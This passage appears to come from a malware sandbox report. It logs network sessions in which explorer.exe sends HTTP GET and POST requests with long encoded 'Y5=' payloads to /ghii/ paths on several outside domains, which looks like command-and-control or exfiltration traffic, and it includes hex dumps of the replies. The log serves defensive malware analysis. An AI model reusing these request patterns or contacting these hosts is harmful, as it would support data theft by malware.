                                                                                            Data Raw: 38 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 19 9a e8 19 28 68 84 26 95 e6 95 94 6a 22 ab d5 07 d9 06 32 5d 1f ea 52 00 98 e9 56 70 b2 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8d(HML),I310Q/Qp/K&T*$'*gd*HN+I-0D7(bTgU(h&j"2]RVp0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            18192.168.2.349718208.100.26.24580C:\Windows\explorer.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Feb 18, 2023 13:07:43.249524117 CET232OUTGET /ghii/?Y5=el6O6QfXWJC5IcEqY7ajPQM3AxnGZ5wjtYFmnAPhTiUm5LiBD7pHZMMmJ3xfiSpQzup0R7I9jNpZRQ1DLLwlO2x3KZLMqqyEgg==&9WI6t=QaRcz HTTP/1.1
                                                                                            Host: www.7dkjhk.com
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            Feb 18, 2023 13:07:43.366576910 CET232INHTTP/1.1 404 Not Found
                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                            Date: Sat, 18 Feb 2023 12:07:43 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 178
                                                                                            Connection: close
                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            19192.168.2.349719141.95.126.8980C:\Windows\explorer.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Feb 18, 2023 13:07:48.468291998 CET233OUTPOST /ghii/ HTTP/1.1
                                                                                            Host: www.assilajamiart.com
                                                                                            Connection: close
                                                                                            Content-Length: 184
                                                                                            Cache-Control: no-cache
                                                                                            Origin: http://www.assilajamiart.com
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Accept: */*
                                                                                            Referer: http://www.assilajamiart.com/ghii/
                                                                                            Accept-Language: en-US
                                                                                            Accept-Encoding: gzip, deflate
                                                                                            Data Raw: 59 35 3d 38 34 30 33 34 6b 4e 39 54 73 4c 50 66 52 6d 73 50 77 52 71 4b 79 65 4d 77 2d 30 59 64 5f 6f 71 78 5a 6e 38 62 43 42 70 5a 4b 28 59 6e 67 32 64 51 64 49 46 58 56 43 4e 49 78 6c 4d 73 51 63 56 44 68 64 37 64 34 6b 61 62 50 42 52 64 7a 33 70 35 33 45 78 30 6b 33 52 38 4a 61 51 64 33 28 76 46 2d 42 49 58 50 48 54 7e 30 6c 47 64 5f 70 49 68 77 48 53 49 61 55 64 75 69 44 68 47 6d 44 74 42 36 73 6b 72 66 47 57 48 72 44 39 57 51 77 41 63 64 42 6e 38 74 53 54 4c 76 34 54 42 74 28 53 72 35 4c 6f 4b 4d 72 44 43 74 7e 6d 46 4a 74 44 39 51 29 2e 00 00 00 00 00 00 00 00
                                                                                            Data Ascii: Y5=84034kN9TsLPfRmsPwRqKyeMw-0Yd_oqxZn8bCBpZK(Yng2dQdIFXVCNIxlMsQcVDhd7d4kabPBRdz3p53Ex0k3R8JaQd3(vF-BIXPHT~0lGd_pIhwHSIaUduiDhGmDtB6skrfGWHrD9WQwAcdBn8tSTLv4TBt(Sr5LoKMrDCt~mFJtD9Q).
                                                                                            Feb 18, 2023 13:07:48.643560886 CET235INHTTP/1.1 404 Not Found
                                                                                            Connection: close
                                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                            cache-control: no-cache, must-revalidate, max-age=0
                                                                                            content-type: text/html; charset=UTF-8
                                                                                            link: <https://assilajamiart.com/wp-json/>; rel="https://api.w.org/"
                                                                                            transfer-encoding: chunked
                                                                                            content-encoding: gzip
                                                                                            vary: Accept-Encoding,User-Agent
                                                                                            date: Sat, 18 Feb 2023 12:07:48 GMT
                                                                                            server: LiteSpeed
                                                                                            Data Raw: 33 61 61 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d fd 93 e3 b6 b1 e0 cf d9 aa fb 1f 60 4d 79 77 64 93 1c 92 fa 1c 8e 67 13 c7 b1 ab ae 2a b9 bc 7a 4e ea ee 9d bd b7 05 91 90 44 2f 45 2a 24 35 1f 99 e8 7f bf ea 06 40 82 24 28 52 1f b3 49 5e d9 ae 38 23 10 e8 6e 34 80 46 a3 bb d1 f8 e6 8b 3f fc f9 bb bf fc d7 7f 7c 4f d6 f9 26 7a ff 3f de 7c 03 ff 4f 22 1a af ee 07 2c 36 ff fa e3 00 0b 19 0d e0 ff 37 2c a7 c4 5f d3 34 63 f9 fd e0 af 7f f9 c1 9c e3 77 2c 8f e9 86 dd 0f 1e 42 f6 b8 4d d2 7c 40 fc 24 ce 59 9c df 0f 1e c3 20 5f df 07 ec 21 f4 99 89 3f 0c 12 c6 61 1e d2 c8 cc 7c 1a b1 7b 07 a1 44 61 fc 89 a4 2c ba 1f 6c d3 64 19 46 6c 40 d6 29 5b de 0f d6 79 be cd bc 9b 9b d5 66 bb b2 92 74 75 f3 b4 8c 6f 1c 6c 24 89 42 e4 ef d2 64 91 e4 d9 bb 02 f5 bb 38 09 e3 80 3d 19 64 99 44 51 f2 f8 8e dc bc 7f f3 e6 37 df 7c 61 9a e4 2f eb 30 23 59 98 33 12 66 24 d9 e6 e1 26 fc 3b 0b c8 63 98 af 49 be 66 e4 bf 12 9a e5 e4 c7 ef ff 4c b6 d1 6e 15 c6 e4 c1 b9 b5 9c 11 31 89 24 e7 19 6a 58 7e b2 b9 79 4c d2 60 9b b2 2c bb e1 75 b3 9b 8c 25 37 c4 34 df bf f9 cd 37 79 98 47 ec fd 7f d0 15 23 71 92 93 65 b2 8b 03 62 92 6f b3 2c 8c c8 b7 bf d0 4d 48 be 4d f3 6f 6e 78 bd 37 bf e1 5c de a6 c9 96 a5 f9 f3 fd 20 59 79 51 02 6c 52 58 ca e2 8f 7f fd 71 00 bd d1 55 47 48 4a ed 2e dc ad 80 80 3d 1f 81 b5 0a b0 1a dd a2 6d e6 a7 e1 36 27 f9 f3 96 dd 0f e8 76 1b 85 3e cd c3 24 be 89 82 af 7f c9 92 78 40 fc 88 66 d9 fd 00 99 66 66 fe 9a 6d a8 b9 4a e9 76 3d 78 ff 32 f8 1d 4e 96 a7 7c e0 15 83 cd ab c0 70 0f 8c c1 ef 78 4d ef a7 97 c1 ef 00 c7 c0 1b fc 6f b6 f8 31 cc 19 7c 0c 03 a5 1d 05 be 52 60 2b 4d f9 e8 5c 3d b2 05 f4 64 60 0c 76 69 74 b0 ea c0 18 60 77 bd 41 bd 9b c6 20 60 bc 93 61 12 0f bc c1 c0 18 6c 77 8b 28 cc d6 2c 1d 78 2f dd 44 24 e9 8a c6 e1 df 91 2b 83 bd 31 d8 26 b0 3a 42 1a 7d eb 03 a3 06 6a df 7e 64 34 f5 d7 e2 83 31 c8 69 ba 62 39 62 11 9d ff 3e ce d3 e7 ff 48 c2 38 e7 9d fa 0b db 6c 23 9a 03 5f e4 ec 6c f2 e1 b7 d9 fd 4b 86 90 3f e6 2c dd 7c cc f2 34 8c 57 7b 20 e6 6f 3b 96 3e 9b 61 bc dd c1 10 a4 ec 6f bb 30 65 01 c1 55 d5 6c 32 d8 7f 30 06 61 fc 47 1a af 76 74 05 48 b9 a8 d8 1b e5 f0 fc 59 ed 6e 8f 31 aa b0 e7 c0 28 f4 18 c1 28 59 25 2a b3 fe e7 86 ae d8 9f 17 bf 30 1f b8 a5 a1 bb 07 79 37 7c 3a de 00 ec 9b 10 00 de f4 98 4e 8f 5b 53 48 c1 9b dd 36 4a 68 90 dd b8 b6 eb de 38 ee 8d 9f 26 db 2d 0b cc 91 b5 8d 61 86 8b 7a 7f ed 98 a0 47 40 44 49 3b f0 26 b6 6d 0c d6 2c 5c ad f3 81 e7 4c a7 c6 c0 a7 5b 3e e3 1a 93 7c 6f 0c b0 6f bd 26 b4 8e 25 fb fd 87 fd 37 37 7c 9d 80 6c 02 41 7b d3 10 a5 16 4a c6 37 6f be 29 24 fe bb 20 ce cc 6d ca 96 2c f7 d7 ef b8 d8 7f 77 73 d3 98 c3 28 c0 3b 9b 2d 93 38 cf ac 55 92 ac 22 46 b7 61 06 32 ba d6 72 40 a3 9c a5 31 2c 19
                                                                                            Data Ascii: 3aa8}`Mywdg*zND/E*$5@$(RI^8#n4F?|O&z?|O",67,_4cw,BM|@$Y _!?a|{Da,ldFl@)[yftuol$Bd8=dDQ7|a/0#Y3f$&;cIfLn1$jX~yL`,u%747yG#qebo,MHMonx7\ YyQlRXqUGHJ.=m6'v>$x@fffmJv=x2N|pxMo1|R`+M\=d`vit`wA `alw(,x/D$+1&:B}j~d41ib9b>H8l#_lK?,|4W{ o;>ao0eUl20aGvtHYn1((Y%*0y7|:N[SH6Jh8&-azG@DI;&m,\L[>|oo&%77|lA{J7o)$ m,ws(;-8U"Fa2r@1,
                                                                                            Feb 18, 2023 13:07:48.643656969 CET236INData Raw: 8d d0 4a b3 ec eb a7 4d 34 20 28 49 ef eb 7c 22 6f 53 fa b7 5d 72 47 7e 60 2c a8 6f 52 0d 9a 6f 96 8c 05 37 28 27 4b ca 2f 83 ff bb 64 b3 61 71 9e f5 24 c4 17 d5 55 8a e4 58 3d 86 71 90 3c 5a 1f 1f b7 6c 93 fc 12 fe c8 f2 3c 8c 57 19 b9 27 2f 83
                                                                                            Data Ascii: JM4 (I|"oS]rG~`,oRo7('K/daq$UX=q<Zl<W'/:1&A6Cl3lf>a0bge+=X=YK}ObHof.`7dXEfKO-rh(;]+, _bQ
                                                                                            Feb 18, 2023 13:07:48.643717051 CET237INData Raw: 66 61 c0 16 34 25 16 83 83 ac 24 87 58 c8 c5 e5 2e 8a c8 0b e7 bb 19 b1 65 ee 11 9f 46 fe 35 31 27 f6 c3 23 f9 9a 4c ec 2f 87 77 e2 7b 0a 07 9b 96 0a 4f dc da e4 11 c7 b6 1f 1e ef e4 08 e3 8f 7d 2f 52 1e c3 80 e9 48 31 c7 ce 41 4a 6a df 0b 42 76
                                                                                            Data Ascii: fa4%$X.eF51'#L/w{O}/RH1AJjBvqrIIJ#HFc1)zaz(?~62DrOPe0XY(baUrxSdlKS')|/f&(qAg &f-4M["
                                                                                            Feb 18, 2023 13:07:48.643784046 CET239INData Raw: 5a a9 58 f7 fc e0 83 d8 85 a2 0b 35 51 4f 06 6d 26 23 ef 49 f9 ab f2 a1 2c 16 8a 32 1f b0 98 3e 84 2b 0c 2a 91 e4 1c e6 07 68 ce 57 3e cd 31 e4 29 89 0d 2b 63 7e 12 07 34 7d 26 16 04 19 c1 9f 1f 1f 53 ba 85 20 28 1a 80 ac ed aa e1 3d 84 30 a5 82
                                                                                            Data Ascii: ZX5QOm&#I,2>+*hW>1)+c~4}&S (=0y$\clKd+QOUv2rT`rq*wk8A8pi8MY$"b[nF`An4ir'edkrmXpdF
                                                                                            Feb 18, 2023 13:07:48.643842936 CET240INData Raw: 49 fc 5e 44 be 02 57 a4 12 c5 19 cc 4d 63 b5 08 21 59 1d ab c8 fa c8 51 51 bd e0 15 aa e7 35 6d 51 72 a4 61 76 2b b6 0b 39 81 60 ca 37 4d a2 e4 6a 9b 86 1b 0a 41 b2 6d 15 0a ff 4e 81 0b 8f 25 b0 67 14 8d af da 2b 71 35 d4 83 1d 06 30 a0 a8 95 a1
                                                                                            Data Ascii: I^DWMc!YQQ5mQrav+9`7MjAmN%g+q50WR&RD7> L^LLD[:)0VjroMp|"y4aAGVK>9Ql&W,FW8'e(ZSCNJsl>'tB(~/U
                                                                                            Feb 18, 2023 13:07:48.643898010 CET241INData Raw: ab 1f 98 16 85 af 51 22 4b 45 56 1f 1e 84 56 6c 50 c5 4a 23 22 8a 92 f0 cb 3a c7 47 d0 b7 52 c5 d3 60 54 ae 45 10 93 17 ea 96 3c 99 4d e7 3c d3 0d 2c 86 8b d2 81 4e c4 06 21 dc b5 a8 d9 7a 09 df b4 2f cf 11 d8 0f 6b 64 88 d8 c2 33 ba 0c 31 b3 45
                                                                                            Data Ascii: Q"KEVVlPJ#":GR`TE<M<,N!z/kd31E<5L}Nz4!yJ3||IiQ9'($RZEdgQ(`-J5qH PO<2wqQVPe~O`cgT:2^`&.NX3E5
                                                                                            Feb 18, 2023 13:07:48.643954039 CET243INData Raw: 9c d7 c4 5c 19 2d 0c eb 11 3e be 8e b8 77 94 cf 98 2a 75 99 a4 1b cf a7 db 30 a7 51 f8 77 78 cd 47 e5 0a 07 a9 98 4b c1 7e 89 85 98 e8 42 f1 29 81 33 ac fc 59 dc cc e0 12 ba c8 9c de 0d 1c b0 23 02 1e ac 5b cb 61 d0 41 5d 69 b4 2d 68 ac 8a 15 d9
                                                                                            Data Ascii: \->w*u0QwxGK~B)3Y#[aA]i-h&_:JKI)bwMa`d>rtj$,V,Tjjw<zQWg`im}F2l2qI'RHWC5<r@GQ]al.(L\BzL}_
                                                                                            Feb 18, 2023 13:07:48.644009113 CET244INData Raw: 8f b3 3c f4 48 e0 eb 8d 9d 66 82 c1 0c 2b 3a c2 e7 1c e6 10 bc 04 11 75 be 0b 87 fd 19 ec 7f 85 c9 20 88 12 57 fb 75 d3 52 4e 09 7e 83 bf 3a 27 1c bc 4d 51 d9 8c 0b 6e 16 f7 52 f4 9f 05 62 fe 32 96 7a a6 95 00 0e 4d 9e 03 02 fd 15 78 24 dc fe ff
                                                                                            Data Ascii: <Hf+:u WuRN~:'MQnRb2zMx$Z''8pXXSM!KqlD3d<&k2oI)!]\rV!zM8y;Za4hX|&"*GSG*WAVPSz1qoV%@6sz>4,k>9cWwz
                                                                                            Feb 18, 2023 13:07:48.644063950 CET245INData Raw: 4a 16 06 6c 41 53 f1 52 41 56 a8 9b 3c e0 71 3c f8 a0 01 61 86 e0 c2 38 ce 7b 21 cc e8 9f 8b 90 03 87 8d cf 4d 89 86 81 75 45 fc f4 31 10 da b2 f0 79 95 d1 55 0e f8 21 95 9f 96 2d a3 98 5e 93 1c 42 1b 4e b8 f3 b9 4d 2c 31 69 ea 0f 64 c1 61 a9 ec
                                                                                            Data Ascii: JlASRAV<q<a8{!MuE1yU!-^BNM,1ida!]wR!N{%Kc`]!__3"h",:fq!A.Q zm;?$bffWq!"oq[ZRW5X\.M?2Jh3+W$x|2vhu*
                                                                                            Feb 18, 2023 13:07:48.644119978 CET247INData Raw: 77 f7 43 6c 38 84 ef 80 c8 31 1b 3a 85 8a b0 ba fd 97 ef 23 a0 29 27 7c 60 77 d2 ab 41 b8 3c e5 c1 1b 5c 23 44 83 28 df c1 d5 1d 24 59 84 11 ab 0d a1 9e f6 4a d7 89 25 08 05 88 47 73 51 d3 fa 74 9e 34 29 39 06 56 85 14 f2 22 38 66 6b 45 83 22 39
                                                                                            Data Ascii: wCl81:#)'|`wA<\#D($YJ%GsQt4)9V"8fkE"94"QG `3MU,(8cl0A@,(aoydb?h1P`GkM9]L7K-;||ta,^+&eh?y_UWWlHu=
                                                                                            Feb 18, 2023 13:07:48.662487030 CET248INData Raw: ff 98 e2 08 e1 ba 80 07 26 97 ca 44 57 0b b8 ef 01 4a f4 77 07 15 18 3d 2e a5 c3 5c a8 d3 5b 3f 56 1c 3e c8 4a 3e d5 3d 1f ad 50 cf da 92 ba a0 7a 69 92 e4 2f a6 c9 aa 57 f6 68 96 f3 2b 7c e8 58 b1 bd ab 80 2d a6 d3 f9 5d 47 45 c7 bb f2 19 1d 4d
                                                                                            Data Ascii: &DWJw=.\[?V>J>=Pzi/Wh+|X-]GEMw.u]Gl9gs, NvUzWcwuzVZ`p~nR:$e;,H$#iL?uy`Ztfln,-74o}


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            2192.168.2.349702184.94.215.9180C:\Windows\explorer.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Feb 18, 2023 13:06:46.623006105 CET130OUTPOST /ghii/ HTTP/1.1
                                                                                            Host: www.energybig.xyz
                                                                                            Connection: close
                                                                                            Content-Length: 5332
                                                                                            Cache-Control: no-cache
                                                                                            Origin: http://www.energybig.xyz
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Accept: */*
                                                                                            Referer: http://www.energybig.xyz/ghii/
                                                                                            Accept-Language: en-US
                                                                                            Accept-Encoding: gzip, deflate
                                                                                            Data Raw: 59 35 3d 4b 75 47 55 64 7a 32 39 51 61 76 34 54 44 4e 59 6c 52 55 4d 52 37 6d 6c 39 36 4d 6b 34 66 39 59 4e 6c 43 4b 61 51 6e 38 45 2d 45 36 6f 4a 28 38 41 36 6d 7a 65 75 63 4f 6d 76 50 33 43 54 33 62 63 59 71 6c 38 5f 41 63 71 58 32 38 6a 77 53 32 72 4d 37 65 69 59 45 6b 74 53 38 76 70 65 39 71 50 67 4f 6e 43 68 36 78 30 65 56 31 6f 4d 72 4c 48 4d 39 50 6c 43 41 47 32 6c 46 6b 35 36 59 77 63 56 30 4d 57 41 66 43 4d 39 38 35 6a 50 31 42 41 41 79 62 46 5a 41 74 78 46 48 54 47 6e 65 69 31 53 74 7a 45 4e 6d 73 62 6f 49 48 4e 64 36 45 4f 74 48 6d 58 4e 68 34 4d 32 75 42 58 31 48 31 69 61 79 47 39 54 28 7a 57 74 6b 48 57 64 78 6e 4d 48 69 72 79 46 7e 44 78 45 56 6c 6d 36 70 68 55 5f 6e 63 4d 61 76 37 78 35 36 33 73 6d 4a 75 33 49 47 7a 65 59 57 56 75 69 56 4f 49 79 6d 41 68 7a 55 4b 62 6e 56 7a 55 57 39 65 58 6f 62 35 38 41 35 4b 47 71 55 2d 42 75 45 6d 74 4e 79 57 30 66 73 64 55 32 78 6a 33 32 76 58 67 63 7e 54 56 47 6d 67 70 4e 31 75 68 75 44 76 78 63 65 50 42 30 41 55 53 31 78 77 55 56 70 70 31 42 37 59 78 6b 67 75 4c 37 62 4b 55 65 58 7a 57 4e 6e 42 7e 72 70 63 4f 50 62 66 54 4e 48 77 63 32 34 44 43 4b 6b 50 79 5f 64 4b 74 2d 71 32 46 6c 6d 37 4f 79 55 33 6c 5a 7e 4c 30 4b 6d 4d 63 4a 79 72 42 76 42 4c 74 78 6b 53 72 75 35 37 78 59 79 4f 78 67 7a 76 51 68 4a 6e 55 55 59 74 61 57 4a 31 47 39 59 35 34 47 6a 51 6e 59 44 37 32 45 4d 50 66 6a 78 4c 76 45 73 52 62 77 55 71 6d 53 6c 52 44 76 55 77 49 30 49 2d 4e 78 43 5f 45 63 46 55 70 63 55 79 74 65 58 76 53 79 4e 67 50 58 5a 53 51 48 4f 38 65 34 66 2d 6d 62 53 6f 28 43 4f 48 68 76 31 7a 4d 66 47 67 63 65 76 58 6f 43 71 5a 4d 6e 5a 7a 6e 64 55 35 66 55 6e 63 30 4e 61 31 58 38 35 6f 64 4b 45 6c 52 4c 76 62 34 7a 33 6b 32 41 43 55 31 39 65 4a 57 43 41 6d 6b 61 4b 37 37 6d 58 5f 6c 66 71 67 31 6b 62 52 39 6b 28 31 61 6a 6b 34 52 4e 43 79 37 68 46 4d 36 6c 38 71 49 5f 38 75 77 76 72 76 33 6a 38 52 73 75 72 6e 30 36 79 5f 7e 57 32 47 62 36 34 75 48 38 75 7a 53 34 77 6d 71 31 32 53 53 5a 50 33 77 31 6e 33 57 31 74 54 4c 4c 69 4f 4d 7a 7a 66 7a 35 66 62 64 72 70 63 46 67 34 4b 4e 75 39 75 50 5a 61 37 6c 35 4b 66 6b 67 36 53 46 64 33 31 77 32 55 35 4e 55 74 69 4b 4a 66 32 51 72 52 66 69 35 79 56 72 35 49 35 34 48 55 33 6e 71 55 5a 56 66 78 43 51 43 64 65 72 67 6d 35 32 48 6e 61 4c 7a 56 76 30 6b 70 61 43 70 65 5a 34 4d 63 5f 63 73 41 50 30 58 6c 54 4e 72 71 75 51 35 56 41 58 75 5a 69 30 54 53 37 53 57 62 4f 62 5a 6a 4e 58 57 47 4f 7e 53 4e 66 28 74 72 4c 61 4a 45 5f 68 39 51 67 79 6e 36 41 44 4c 30 36 4f 55 48 37 6c 56 71 37 52 73 49 38 58 58 6a 6f 52 73 53 70 73 57 63 71 78 31 42 6c 76 4c 6d 66 4a 46 36 76 66 4c 42 78 32 54 6b 79 58 56 6b 4c 70 64 46 59 7e 65 30 6e 38 30 54 4b 72 6c 73 34 37 48 38 7a 46 61 6f 39 35 71 58 70 30 78 70 34 4a 53 6c 62 58 55 45 48 64 6f 38 4e 68 38 33 56 57 55 43 64 34 4c 5a 59 61 39 30 66 6b 69 46 73 49 79 42 37 79 55 70 31 41 69 31 78 49 4e 6c 44 33 4e 67 63 55 53 53 5f 4a 36 51 48 55 34 75 79 34 47 78 36 43 34 58 37 36 79 39 50 53 67 43 33 73 6a 76 34 52 45 74 66 30 65 4b 47 49 4d 6a 74 53 43 68 31 4f 2d 76 75 33 37 68 53 51 52 44 79 57 75 4f 79 4a 54 58 5f 69 33 4a 39 66 43 6a 35 64 39 43 4b 4f 41 59 6b 77 63 6a 6f 5a 55 76 45 7e 31 4a 69 5a 73 56 57 5a 47 41 47 71 70 6e 6a 41 64 45 68 5a 36 7a 5a 7e 76 34 71 7e 59 49 2d 76 51 37 73 75 34 70 65 48 41 56 33 37 62 6d 52 31 2d 42 59 31 62 57 70 53 74 58 6f 49 30 37 37 64 45 4e 78 50 6a 75 54 4e 43 35 6f 52 6a 7e 44 6a 62 65 5a 4d 72 44 74 68 30 71 37 4f 36 36 5f 72 34 67 70 6d 61 37 4a 68 67 44 4e 47 43 54 2d 64 65 47 33 33 49 55 36 7e 41 72 6d 59 4e 61 35 68 43 4d 33 48 4a 53 4b 54 6f 55 30 75 71 55 48 75 78 76 45 44 36 47 46 46 58 49 51 32 47 42 63 4c 59 45 50 46 55 6c 61 79 43 70 50 59 69 62 7a 61 59 6e 36 7e 6e 6e 33 76 7a 74 4f 78 4b 72 62 53 51 63 59 4e 37 48 79 32 58 48 72 41 56 35 61 6a 30 28 43 52 62 33 66 33 65 6c 63 48 77 59 4f 37 53 35 6b 56 6b 54 50 4c 62 42 66 4f 76 47 77 66 76 50 4c 6e 59 75 6b 4b 77 56 59 56 32 72 77 52 43 48 64 42 42 7e 4b 6b 52 4b 33 67 44 43 58 48 71 43 54 6e 41 43 4b 4a 32 52 39 6e 72 6d 52 78 41 4d 67 53 69 33 70 65 71 6a 4b 4b 68 5a 59 45 62 64 78 77 31 50 4e
                                                                                            Data Ascii: Y5=KuGUdz29Qav4TDNYlRUMR7ml96Mk4f9YNlCKaQn8E-E6oJ(8A6mzeucOmvP3CT3bcYql8_AcqX28jwS2rM7eiYEktS8vpe9qPgOnCh6x0eV1oMrLHM9PlCAG2lFk56YwcV0MWAfCM985jP1BAAybFZAtxFHTGnei1StzENmsboIHNd6EOtHmXNh4M2uBX1H1iayG9T(zWtkHWdxnMHiryF~DxEVlm6phU_ncMav7x563smJu3IGzeYWVuiVOIymAhzUKbnVzUW9eXob58A5KGqU-BuEmtNyW0fsdU2xj32vXgc~TVGmgpN1uhuDvxcePB0AUS1xwUVpp1B7YxkguL7bKUeXzWNnB~rpcOPbfTNHwc24DCKkPy_dKt-q2Flm7OyU3lZ~L0KmMcJyrBvBLtxkSru57xYyOxgzvQhJnUUYtaWJ1G9Y54GjQnYD72EMPfjxLvEsRbwUqmSlRDvUwI0I-NxC_EcFUpcUyteXvSyNgPXZSQHO8e4f-mbSo(COHhv1zMfGgcevXoCqZMnZzndU5fUnc0Na1X85odKElRLvb4z3k2ACU19eJWCAmkaK77mX_lfqg1kbR9k(1ajk4RNCy7hFM6l8qI_8uwvrv3j8Rsurn06y_~W2Gb64uH8uzS4wmq12SSZP3w1n3W1tTLLiOMzzfz5fbdrpcFg4KNu9uPZa7l5Kfkg6SFd31w2U5NUtiKJf2QrRfi5yVr5I54HU3nqUZVfxCQCdergm52HnaLzVv0kpaCpeZ4Mc_csAP0XlTNrquQ5VAXuZi0TS7SWbObZjNXWGO~SNf(trLaJE_h9Qgyn6ADL06OUH7lVq7RsI8XXjoRsSpsWcqx1BlvLmfJF6vfLBx2TkyXVkLpdFY~e0n80TKrls47H8zFao95qXp0xp4JSlbXUEHdo8Nh83VWUCd4LZYa90fkiFsIyB7yUp1Ai1xINlD3NgcUSS_J6QHU4uy4Gx6C4X76y9PSgC3sjv4REtf0eKGIMjtSCh1O-vu37hSQRDyWuOyJTX_i3J9fCj5d9CKOAYkwcjoZUvE~1JiZsVWZGAGqpnjAdEhZ6zZ~v4q~YI-vQ7su4peHAV37bmR1-BY1bWpStXoI077dENxPjuTNC5oRj~DjbeZMrDth0q7O66_r4gpma7JhgDNGCT-deG33IU6~ArmYNa5hCM3HJSKToU0uqUHuxvED6GFFXIQ2GBcLYEPFUlayCpPYibzaYn6~nn3vztOxKrbSQcYN7Hy2XHrAV5aj0(CRb3f3elcHwYO7S5kVkTPLbBfOvGwfvPLnYukKwVYV2rwRCHdBB~KkRK3gDCXHqCTnACKJ2R9nrmRxAMgSi3peqjKKhZYEbdxw1PNobPTZ9UN0chhk6KLOUsI2LxlTpvtoe4h4rleQAHK90hOVVZSfnrpvxgm11Vsu1clHJh5Ioqo4hl3~odXlsts9e6Y777M8eVBdBZbonrfiHVQNJbKHDRHEJmV1r(b3TUXlWn14HjZWZIX0qq4wSKXAWruBF7i1Qn1Uyvg6Penql5e8hQe2vaz2mXCVEAdUluC16jMn0qXoeZtCrcnIu4y5zAkg4DeJ202wwqKOk~UhHHwDjIRfApDUJs97Cxk~lwFb-RcJqCEm1w5HPnXlsEa(AcYQ-nnnAbXo_NubMFB5aG-qJTz(hF2BYsJ8U2JU8WzW6FdR0P1gZWy46YY5kRPF2hAZs~bxybnT_Bt5K0tZEt1GddpAF0Tfm(tUgN2QbC3HfeH0zpTcWYFAAf8oniFAW(73Ot5GXKBx6(2yNfvhlFVaVzKH1OA874dHEi167yDXRA7y3RIIG1uUY~J~8fH82WWt6DtUSzHuZkUp4I1E2opqEbtQ29lmjPauK5e5yqnhwplh6qzZALW~gB1dC6uRyA22wncBpx2anJHockAvlOQk1BvMvweOGFR5A46sPzNzbdGWXWEyq7C4jgydvYyHzlWgEvBiulJ1t(G5QvT~TYqXtipvxZEl3rvac68EYWM81WlsPhP~-UdrHNZDBpHu8rWFxR_2_GP73kGe5s19MxhxTjQ1xxoj6PPO4a85rc1xXUrqaFlo1FRKaUyE4gDFnjKrycRMpYWybpashjX6rME0QYef4MVBcI9XvVuhDz1oW6mPddTM3ambP(LluJ6fYm92WS0XqKbgIeCLK8K0sBWGEzlxZYlMUehVO170tEa36(y6M(dlb761WTv2YPNJ_xVu9M0NauwEjh26qcIpkXZjvLC5HrOtHWGTy(giS20R5~OR5~JggVCwRmK7pXxW0~rX47Xf6q9hJivJfP5(vDfOyY-gIFZSEwWJ4prFNiwZfX6Zc7rVV4NX3ovjHtWkvDayj5UMAi6WrJP5gXgjNO6YGB_mpeaWIrEUWyQ6td_kxrS~n(SbeiqHS0q6Ou8ZFYJSnYSa1arjhjeD6f6KFQ4o-zl0ZjY0fh9lBxaVQ4EpFVaEkNUgBoswPAggBx8cgAi~_0QKJnCaAPs72rKYBWxFe9nk6wzOSPkJRo5qPhFSZSYgHLr6_UaKX5GAMat~ZflWga0YPy6QcVRmp0S8L31EsP7N9XjJXE994faNYlrY6BwiKXesHrKhE~zocWwV51CMrlDsbrr~gkF8VHlv9gU(ddZzzHLIARBSvDEPbmd2EqaPIVyeqayvN5vRbIwU5GdUJpGsalw1AwAhLqBG2~f38RZF_LSxA802VoMoaTGvdZqiSriB4c5389h~q5scHVBPi7nI4s7hOZSjl6VkbbrypN1kv1yHW~_sBgFbG5XBg832L028pIPL5LkszJs15DTtvI-bW~bafyuJjhfTa84eIFWgkaiaoJxLViBNYMHf-kHLGZfCI8nBbSsBn5Z~yKgpuxRyBP1Hfn9G0qmvqVMZFrzl3VRPbGId_aEZjljF6kfg78mMTXZrHO6AaqdYgBna7LnbFjvGphLLj641gKhzviPM8tHedE31Ov7WNfMkajLHrBcoIMp9GGphyTnh1Z0pQ44Z4wICL1iI